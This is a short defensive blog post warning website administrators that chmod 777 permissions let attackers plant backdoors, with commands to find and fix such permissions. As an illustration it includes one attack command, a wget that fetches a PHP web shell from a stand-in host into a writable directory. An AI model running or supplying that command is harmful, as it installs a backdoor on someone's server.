Heal Your Church WebSite

Teaching, rebuking, correcting & training in righteous web design.

How to make ‘find -perm 777’ your first ssh security stop

Want to get hacked? It’s easy, just ‘chmod 777’ everything the next time you install a bbs or photo gallery application. Don’t want to get hacked? Read on and ‘find’ how hackers see, and exploit the unsecured areas of your system.consider chmod 777 vs. chmod 755 to lock down public paths & directories

For those of you running online community applications such as phpBB, vBulletin, Coppermine Gallery, Mambo and a few others, installation can be a breeze if you have shell access. That said, installations can also lead to an unwanted visit if you get sloppy with your file permissions during the install.

For today’s example, I’ll pick on vBulletin today because it is a commercial product, but be warned: today’s topic of discussion equally applies to ANY host of ‘open sores’ applications as well.

The neer-do-well runs a Google search for those websites that are ‘Powered by: vBulletin Version 3.nn.nn.’ Upon finding a potential victom, they visit the site and … pay attention now … through their browser request a URL on your system that contains a remote command. That first remote command is likely to include “find -perm 777” giving the hakr all the information he needs to then “wget http://badguyhost.ru/myshell.php -O /your/unsecure/directory/logon.php” onto your system.

Once such a php-based backdoor application is loaded, there is nothing left but to wipe your system clean and pray your backups are recent and reliable (more on that topic another time).

So two things I ask of you.

  1. Keep your online applications up-to-date – get on their mailing list to kee abreast of changes, updates and patches.
  2. For those of you with shell access to your system, run file permission scans such as ‘find -perm 777’ on your system before someone less trustworthy does. You might be disturbed by what you ‘find.’

For those of you whose paranoia-meter just went off scale, here is a command that for now will lock down those open areas:

find . -perm 777 -exec chmod 755 {} \;

For those of you with root access:

find / -perm 777 -type d

You may also want to run a scan for programs that provide web-based shell access. You’ll be glad you did.

Comments are closed.